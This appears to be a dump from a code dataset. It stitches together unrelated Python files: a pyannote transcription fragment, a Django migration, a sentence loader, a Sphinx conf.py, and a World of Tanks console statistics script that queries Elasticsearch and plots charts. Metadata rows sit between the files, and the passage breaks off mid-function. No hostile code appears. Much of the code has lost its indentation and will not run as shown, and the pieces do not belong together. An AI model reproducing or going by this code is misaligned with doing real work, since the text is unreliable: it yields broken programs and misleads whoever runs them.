def for_json(self):
return {PYANNOTE_JSON_TRANSCRIPTION: node_link_data(self)}
@classmethod
def from_json(cls, data):
graph = node_link_graph(data[PYANNOTE_JSON_TRANSCRIPTION])
mapping = {node: T(node) for node in graph}
graph = nx.relabel_nodes(graph, mapping)
return cls(graph=graph, **graph.graph)
# === IPython Notebook displays ===========================================
def _repr_svg_(self):
        from .notebook import repr_transcription
return repr_transcription(self)
| pyannote/core/transcription.py | 18,353 | … | 8,010 | en | 0.709216 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 09:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lowfat', '0144_auto_20190123_1534'),
]
operations = [
migrations.AddField(
model_name='fund',
name='success_reported',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='fund',
name='success_targeted',
field=models.TextField(default=''),
preserve_default=False,
),
migrations.AddField(
model_name='historicalfund',
name='success_reported',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='historicalfund',
name='success_targeted',
field=models.TextField(default=''),
preserve_default=False,
),
]
| lowfat/migrations/0145_auto_20181213_0921.py | 1,014 | -*- coding: utf-8 -*- Generated by Django 1.11.15 on 2018-12-13 09:21 | 69 | en | 0.598932 |
#!/bin/python
"""
This is a class for loading input sentences
"""
class SentenceAttr:
def __init__(self, attr_list):
self.article_id = attr_list[1]
self.title = attr_list[2]
self.sentence = attr_list[3]
self.article_structure = attr_list[4]
self.place = attr_list[5]
def __str__(self):
return "Article Id: " + self.article_id + "\n" + "Title: " + self.title + "\n"\
+"Sentence: " + self.sentence + "\n" +\
"Article Structure: " + self.article_structure + "\n" + "Place: " + self.place + "\n"
class LoadSentences:
def __init__(self, filepath, num):
self.filepath = filepath
self.num = num
"""对导入的文本做简单清洗"""
def Process(self, line):
line = line.replace('\n', '')
line_list = line.split("|")
return SentenceAttr(line_list)
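    # Each input line is expected to be pipe-delimited with six fields, e.g.
    # (values illustrative; field 0 is unused by SentenceAttr):
    #   0|article_42|Some Title|A sentence.|body|3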
"""逐行读取文件并返回迭代器"""
    def Reader(self):
        with open(self.filepath) as f:
            count = 0
            for line in f:
                if count == self.num:
                    break
                yield self.Process(line)
                count += 1
def test():
sentences_path = "../0_output.txt0.txt"
sentences = LoadSentences(sentences_path, 5).Reader()
for each in sentences:
print(each)
if __name__ == "__main__":
test()
| src/util/load_sentence.py | 1,429 | … | 57 | en | 0.850626 |
#!/usr/bin/env python
#
# sqpdfo documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import sqpdfo
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'SQPDFO'
copyright = "2019, Anke Troeltzsch"
author = "Anke Troeltzsch"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = sqpdfo.__version__
# The full version, including alpha/beta/rc tags.
release = sqpdfo.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'sqpdfodoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'sqpdfo.tex',
'SQPDFO Documentation',
'Anke Troeltzsch', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'sqpdfo',
'SQPDFO Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'sqpdfo',
'SQPDFO Documentation',
author,
'sqpdfo',
'One line description of project.',
'Miscellaneous'),
]
| docs/conf.py | 4,774 | !/usr/bin/env python sqpdfo documentation build configuration file, created by sphinx-quickstart on Fri Jun 9 13:47:02 2017. This file is execfile()d with the current directory set to its containing dir. Note that not all possible configuration values are present in this autogenerated file. All configuration values have a default; values that are commented out serve to show the default. If extensions (or modules to document with autodoc) are in another directory, add these directories to sys.path here. If the directory is relative to the documentation root, use os.path.abspath to make it absolute, like shown here. -- General configuration --------------------------------------------- If your documentation needs a minimal Sphinx version, state it here. needs_sphinx = '1.0' Add any Sphinx extension module names here, as strings. They can be extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. Add any paths that contain templates here, relative to this directory. The suffix(es) of source filenames. You can specify multiple suffix as a list of string: source_suffix = ['.rst', '.md'] The master toctree document. General information about the project. The version info for the project you're documenting, acts as replacement for |version| and |release|, also used in various other places throughout the built documents. The short X.Y version. The full version, including alpha/beta/rc tags. The language for content autogenerated by Sphinx. Refer to documentation for a list of supported languages. This is also used if you do content translation via gettext catalogs. Usually you set "language" from the command line for these cases. List of patterns, relative to source directory, that match files and directories to ignore when looking for source files. This patterns also effect to html_static_path and html_extra_path The name of the Pygments (syntax highlighting) style to use. If true, `todo` and `todoList` produce output, else they produce nothing. -- Options for HTML output ------------------------------------------- The theme to use for HTML and HTML Help pages. See the documentation for a list of builtin themes. Theme options are theme-specific and customize the look and feel of a theme further. For a list of options available for each theme, see the documentation. html_theme_options = {} Add any paths that contain custom static files (such as style sheets) here, relative to this directory. They are copied after the builtin static files, so a file named "default.css" will overwrite the builtin "default.css". -- Options for HTMLHelp output --------------------------------------- Output file base name for HTML help builder. -- Options for LaTeX output ------------------------------------------ The paper size ('letterpaper' or 'a4paper'). 'papersize': 'letterpaper', The font size ('10pt', '11pt' or '12pt'). 'pointsize': '10pt', Additional stuff for the LaTeX preamble. 'preamble': '', Latex figure (float) alignment 'figure_align': 'htbp', Grouping the document tree into LaTeX files. List of tuples (source start file, target name, title, author, documentclass [howto, manual, or own class]). -- Options for manual page output ------------------------------------ One entry per manual page. List of tuples (source start file, name, description, authors, manual section). -- Options for Texinfo output ---------------------------------------- Grouping the document tree into Texinfo files. 
List of tuples (source start file, target name, title, author, dir menu entry, description, category) | 3,555 | en | 0.699926 |
from argparse import ArgumentParser
from collections import OrderedDict
from datetime import datetime, timedelta
from elasticsearch6 import Elasticsearch
from json import dump, load
from math import pi, sin, cos
from matplotlib import pyplot as plt
from matplotlib import dates as mdates
from matplotlib import ticker as mtick
from requests import get
from tweepy import OAuthHandler, API
import traceback
# Multi-day, use gte
battles_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"1": "desc"
},
"min_doc_count": 0
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
# Multi-day, use gte
players_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"_count": "desc"
},
"min_doc_count": 0
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
unique_count_query = {
"aggs": {
"2": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"cardinality": {
"field": "account_id"
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
new_players_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "created_at",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"_count": "desc"
},
"min_doc_count": 0
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "created_at",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"created_at": {
"gte": None,
"lt": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
personal_players_query = {
'sort': [],
'_source': {'excludes': []},
'aggs': {
'2': {
'date_histogram': {
'field': 'date',
'interval': '1d',
'min_doc_count': 0
}
}
},
'stored_fields': ['_source'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{
'range': {
'date': {
'gt': None,
'lte': None,
'format': 'date'
}
}
}
],
'filter': [],
'should': [],
'must_not': []
}
},
'size': 500
}
accounts_per_battles_range_query = {
'aggs': {
'2': {
'range': {
'field': 'battles',
'ranges': [
{'from': 1, 'to': 5},
{'from': 5, 'to': 10},
{'from': 10, 'to': 20},
{'from': 20, 'to': 30},
{'from': 30, 'to': 40},
{'from': 40, 'to': 50},
{'from': 50}
],
'keyed': True
},
'aggs': {
'3': {
'terms': {
'field': 'console.keyword',
'size': 2,
'order': {'_count': 'desc'}
}
}
}
}
},
'size': 0,
'_source': {'excludes': []},
'stored_fields': ['*'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{'match_all': {}},
{'range': {'date': {'gt': None, 'lte': None, 'format': 'date'}}}
],
'filter': [],
'should': [],
'must_not': []
}
}
}
five_battles_a_day_query = {
'aggs': {
'4': {
'date_histogram': {
'field': 'date',
'interval': '1d',
'min_doc_count': 0
},
'aggs': {
'3': {
'terms': {
'field': 'console.keyword',
'size': 2,
'order': {'_count': 'desc'}
},
'aggs': {
'2': {
'range': {
'field': 'battles',
'ranges': [{'from': 5, 'to': None}],
'keyed': True
}
}
}
}
}
}
},
'size': 0,
'_source': {'excludes': []},
'stored_fields': ['*'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{'match_all': {}},
{
'range': {
'date': {
'gte': None,
'lte': None,
'format': 'date'
}
}
}
],
'filter': [],
'should': [],
'must_not': []
}
}
}
CW_TANKS = 'ASSIGN `build_cw_tanks_list(config)` TO ME'
cw_popular_tanks_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"4": {
"terms": {
"field": "console.keyword",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
},
"3": {
"terms": {
"field": "tank_id",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
}
}
},
"size": 0,
"_source": {
"excludes": []
},
"stored_fields": [
"*"
],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{
"query_string": {
"query": CW_TANKS,
"analyze_wildcard": True,
"default_field": "*"
}
},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
ww2_popular_tanks_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "30m",
"time_zone": "America/Chicago",
"min_doc_count": 0
},
"aggs": {
"4": {
"terms": {
"field": "console.keyword",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
},
"3": {
"terms": {
"field": "tank_id",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
}
}
},
"size": 0,
"_source": {
"excludes": []
},
"stored_fields": [
"*"
],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{
"query_string": {
"query": 'NOT (' + CW_TANKS + ')',
"analyze_wildcard": True,
"default_field": "*"
}
},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
BATTLES_PNG = '/tmp/battles.png'
PLAYERS_PNG = '/tmp/players.png'
NEWPLAYERS_PNG = '/tmp/newplayers.png'
AVERAGE_PNG = '/tmp/average.png'
ACCOUNTAGE_PNG = '/tmp/accountage.png'
BATTLERANGE_PNG = '/tmp/battlerange.png'
FIVEADAY_PNG = '/tmp/fiveaday.png'
PLAYERSLONG_PNG = '/tmp/playerslong.png'
BATTLESLONG_PNG = '/tmp/battleslong.png'
AVERAGELONG_PNG = '/tmp/averagelong.png'
MODEBREAKDOWN_PNG = '/tmp/modebreakdown.png'
MODEBREAKDOWNLONG_PNG = '/tmp/modebreakdownlong.png'
MODEBREAKDOWNPERCENT_PNG = '/tmp/modebreakdownpercent.png'
MODEBREAKDOWNPERCENTLONG_PNG = '/tmp/modebreakdownpercentlong.png'
def manage_config(mode, filename='config.json'):
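    """Load the JSON config when mode is 'read', or write a default config template when mode is 'create'."""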
if mode == 'read':
with open(filename) as f:
return load(f)
elif mode == 'create':
with open(filename, 'w') as f:
dump(
{
'days': 14,
'long term': 90,
'omit errors long term': True,
'twitter': {
'api key': '',
'api secret key': '',
'access token': '',
'access token secret': '',
'message': "Today's update on the active player count and total battles per platform for #worldoftanksconsole."
},
'elasticsearch': {
'hosts': ['127.0.0.1']
},
'battle index': 'diff_battles-*',
'tank index': 'diff_tanks-*',
'unique': [7, 14, 30],
'account age': [7, 30, 90, 180, 365, 730, 1095, 1460, 1825],
'battle ranges': [
{"from": 1, "to": 5},
{"from": 5, "to": 10},
{"from": 10, "to": 20},
{"from": 20, "to": 30},
{"from": 30, "to": 40},
{"from": 40, "to": 50},
{"from": 50}
],
'watermark text': '@WOTC_Tracker',
'wg api key': 'DEMO'
                },
                f
            )
def query_es_for_graphs(config):
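    """Query Elasticsearch for daily battle counts, active players and new accounts over the configured short-term window."""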
now = datetime.utcnow()
then = now - timedelta(days=config['days'])
es = Elasticsearch(**config['elasticsearch'])
# Setup queries
battles_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
new_players_query['query']['bool'][
'must'][-1]['range']['created_at']['gte'] = then.strftime('%Y-%m-%d')
new_players_query['query']['bool'][
'must'][-1]['range']['created_at']['lt'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
battles = es.search(index=config['battle index'], body=battles_query)
players = es.search(index=config['battle index'], body=players_query)
newplayers = es.search(index='players', body=new_players_query)
# Filter numbers
battles_xbox = []
battles_ps = []
players_xbox = []
players_ps = []
newplayers_xbox = []
newplayers_ps = []
averages_xbox = []
averages_ps = []
for bucket in battles['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
battles_xbox.append(0)
battles_ps.append(0)
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
battles_xbox.append(subbucket['1']['value'])
else:
battles_ps.append(subbucket['1']['value'])
for bucket in players['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
players_xbox.append(0)
players_ps.append(0)
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
players_xbox.append(subbucket['doc_count'])
else:
players_ps.append(subbucket['doc_count'])
for bucket in newplayers['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
newplayers_xbox.append(0)
newplayers_ps.append(0)
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
newplayers_xbox.append(subbucket['doc_count'])
else:
newplayers_ps.append(subbucket['doc_count'])
for b, p in zip(battles_xbox, players_xbox):
averages_xbox.append(b / p)
for b, p in zip(battles_ps, players_ps):
averages_ps.append(b / p)
dates = [b['key_as_string'].split('T')[0] for b in players[
'aggregations']['2']['buckets']]
newplayers_dates = [b['key_as_string'].split('T')[0] for b in newplayers[
'aggregations']['2']['buckets']]
return dates, battles_xbox, battles_ps, players_xbox, players_ps, newplayers_dates, newplayers_xbox, newplayers_ps, averages_xbox, averages_ps
def query_es_for_unique(config):
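    """Count unique active accounts per platform for each look-back window listed under config['unique']."""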
now = datetime.utcnow()
es = Elasticsearch(**config['elasticsearch'])
unique = {'Xbox': [], 'Playstation': []}
unique_count_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
for earliest in config['unique']:
unique_count_query['query']['bool']['must'][-1]['range']['date'][
'gte'] = (now - timedelta(days=earliest)).strftime('%Y-%m-%d')
results = es.search(index=config['battle index'], body=unique_count_query)
for bucket in results['aggregations']['2']['buckets']:
if bucket['key'] == 'xbox':
unique['Xbox'].append(bucket['1']['value'])
else:
unique['Playstation'].append(bucket['1']['value'])
return unique
def create_activity_graphs(dates, battles_xbox, battles_ps, players_xbox, players_ps, newplayers_dates, newplayers_xbox, newplayers_ps, averages_xbox, averages_ps, watermark_text='@WOTC_Tracker'):
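    """Render the short-term players, battles, new accounts and average-battles charts to their PNG files."""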
shifted_dates = [(datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d') for d in dates]
# Players PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Active Accounts Per Platform')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, players_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, players_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(PLAYERS_PNG)
del fig
# Battles PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Total Battles Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, battles_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, battles_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(BATTLES_PNG)
del fig
# New Players PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('New Accounts Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(dates, ha='right')
ax1.plot(newplayers_dates, newplayers_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(newplayers_dates, newplayers_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(NEWPLAYERS_PNG)
del fig
# Averages PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Average Battles Played Per Account Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, averages_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, averages_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(AVERAGE_PNG)
del fig
def query_es_for_active_accounts(config):
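    """Scroll yesterday's active accounts, look up their creation dates and bucket them by account age per platform."""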
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
personal_players_query['query']['bool']['must'][-1]['range']['date']['gt'] = then.strftime('%Y-%m-%d')
personal_players_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Get all account IDs of active players
hits = []
response = es.search(index=config['battle index'], body=personal_players_query, scroll='30s')
while len(response['hits']['hits']):
hits.extend(response['hits']['hits'])
response = es.scroll(scroll_id=response['_scroll_id'], scroll='3s')
flattened = [doc['_source']['account_id'] for doc in hits]
# Query account information to get age details
player_info_extracted = []
for i in range(0, len(flattened), 10000):
active_player_info = es.mget(index='players', doc_type='player', body={'ids': flattened[i:i+10000]}, _source=['account_id', 'console', 'created_at'])
player_info_extracted.extend([doc['_source'] for doc in active_player_info['docs']])
sorted_player_info = sorted(player_info_extracted, key = lambda d: d['created_at'])
buckets = {
"xbox": OrderedDict((v, 0) for v in sorted(config['account age'])),
"ps": OrderedDict((v, 0) for v in sorted(config['account age'])),
"all": OrderedDict((v, 0) for v in sorted(config['account age']))
}
# Sum account ages based on range of age
buckets['xbox']['other'] = 0
buckets['ps']['other'] = 0
buckets['all']['other'] = 0
for player in sorted_player_info:
delta = now - datetime.strptime(player['created_at'], '%Y-%m-%dT%H:%M:%S')
for key in buckets['all'].keys():
if not isinstance(key, int):
buckets['all'][key] += 1
buckets[player['console']][key] += 1
break
elif delta.total_seconds() <= (key * 24 * 60 * 60):
buckets['all'][key] += 1
buckets[player['console']][key] += 1
break
return buckets
def calc_label(value):
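    """Convert a number of days into a human-friendly label (days, weeks, months or years)."""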
if value < 7:
return '{} day{}'.format(value, '' if value == 1 else 's')
elif 7 <= value < 30:
return '{} week{}'.format(value // 7, '' if value // 7 == 1 else 's')
elif 30 <= value < 365:
return '{} month{}'.format(value // 30, '' if value // 30 == 1 else 's')
else:
return '{} year{}'.format(value // 365, '' if value // 365 == 1 else 's')
def calc_angle(wedge):
return (wedge.theta2 - wedge.theta1) / 2 + wedge.theta1
def create_account_age_chart(buckets, watermark_text='@WOTC_Tracker'):
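    """Draw the nested pie chart of active accounts by account age and save it to ACCOUNTAGE_PNG."""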
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
then = datetime.utcnow() - timedelta(days=1)
fig.suptitle("Breakdown of active accounts by account age for {}".format(then.strftime('%Y-%m-%d')))
ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10)
ax1.axis('equal')
size = 0.125
outer_labels = []
prev = 0
for key in buckets['all'].keys():
if not isinstance(key, int):
outer_labels.append('>' + calc_label(prev))
else:
outer_labels.append('{} - {}'.format(calc_label(prev), calc_label(key)))
prev = key
# Outer pie chart
outer_cmap = plt.get_cmap("binary")
outer_colors = outer_cmap([i * 10 for i in range(10, len(buckets['all'].keys()) + 11)])
outer_wedges, outer_text, outer_autotext = ax1.pie(
buckets['all'].values(),
explode=[0.1 for __ in outer_labels],
radius=1,
colors=outer_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='%1.1f%%',
pctdistance=1.1
#labels=outer_labels
)
bbox_props = dict(boxstyle='square,pad=0.3', fc='w', ec='k', lw=0.72)
kw = dict(arrowprops=dict(arrowstyle='-'), bbox=bbox_props, zorder=0, va='center')
for i, wedge in enumerate(outer_wedges):
angle = calc_angle(wedge)
y = sin(angle * (pi / 180))
x = cos(angle * (pi / 180))
align = 'right' if x < 0 else 'left'
connectionstyle = 'angle,angleA=0,angleB={}'.format(angle)
kw['arrowprops'].update({'connectionstyle': connectionstyle})
ax1.annotate(
outer_labels[i],
xy=(x, y),
xytext=(1.35*(-1 if x < 0 else 1), 1.4*y),
horizontalalignment=align,
**kw
)
# Inner pie chart
inner_cmap = plt.get_cmap("tab20c")
pie_flat = list(zip(buckets['xbox'].values(), buckets['ps'].values()))
inner_labels = []
for pair in pie_flat:
inner_labels.extend(['xbox', 'ps'])
inner_colors = inner_cmap([1 if console == 'ps' else 9 for console in inner_labels])
inner_wedges, inner_text, inner_autotext = ax1.pie(
[item for sublist in pie_flat for item in sublist],
explode=[0.1 for __ in inner_labels],
radius=1.05-size,
colors=inner_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='',
pctdistance=0.9
)
# Replace inner text with actual values
for i, label, wedge, text in zip(range(len(inner_wedges)), inner_labels, inner_wedges, inner_autotext):
text.set_text(buckets[label]['other' if i // 2 > len(buckets['all'].keys()) - 1 else list(buckets['all'].keys())[i // 2]])
angle = calc_angle(wedge)
if 90 < angle < 270:
angle += 180
text.set_rotation(angle)
# Patch inner wedges to group together in explosion
# Influenced by: https://stackoverflow.com/a/20556088/1993468
groups = [[i, i+1] for i in range(0, len(inner_wedges), 2)]
radfraction = 0.1
for group in groups:
angle = ((inner_wedges[group[-1]].theta2 + inner_wedges[group[0]].theta1)/2) * (pi / 180)
for g in group:
wedge = inner_wedges[g]
wedge.set_center((radfraction * wedge.r * cos(angle), radfraction * wedge.r * sin(angle)))
# Add subplot in second row, below nested pie chart
ax2 = plt.subplot2grid((11, 1), (10, 0))
ax2.axhline(color='black', y=0)
# Xbox, Playstation
totals = [sum(buckets['xbox'].values()), sum(buckets['ps'].values()), sum(buckets['all'].values())]
ypos = -0.18
bottom = 0
height = 0.1
for i in range(len(totals) - 1):
width = totals[i] / totals[-1]
ax2.barh(ypos, width, height, left=bottom, color=inner_colors[i])
xpos = bottom + ax2.patches[i].get_width() / 2
bottom += width
ax2.text(xpos, ypos, '{} ({:.1f}%)'.format(totals[i], (totals[i] / totals[-1]) * 100), ha='center', va='center')
ax2.axis('off')
ax2.set_title('Total Active Players', y=0.325)
ax2.set_xlim(0, 1)
ax1.legend(inner_wedges[-2:], ['xbox', 'ps'], loc='lower right')
fig.text(0.5, 0.5, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(ACCOUNTAGE_PNG)
del fig
def query_es_for_accounts_by_battles(config):
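    """Bucket yesterday's active accounts by the number of battles they played, per platform."""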
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
accounts_per_battles_range_query['query']['bool']['must'][-1]['range']['date']['gt'] = then.strftime('%Y-%m-%d')
accounts_per_battles_range_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
if 'battle ranges' in config:
accounts_per_battles_range_query['aggs']['2']['range']['ranges'] = config['battle ranges']
response = es.search(index=config['battle index'], body=accounts_per_battles_range_query)
buckets = {
"xbox": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
"ps": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
"all": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
}
for key, value in response['aggregations']['2']['buckets'].items():
buckets['all'][key] = value['doc_count']
for bucket in value['3']['buckets']:
buckets[bucket['key']][key] = bucket['doc_count']
return buckets
def create_accounts_by_battles_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
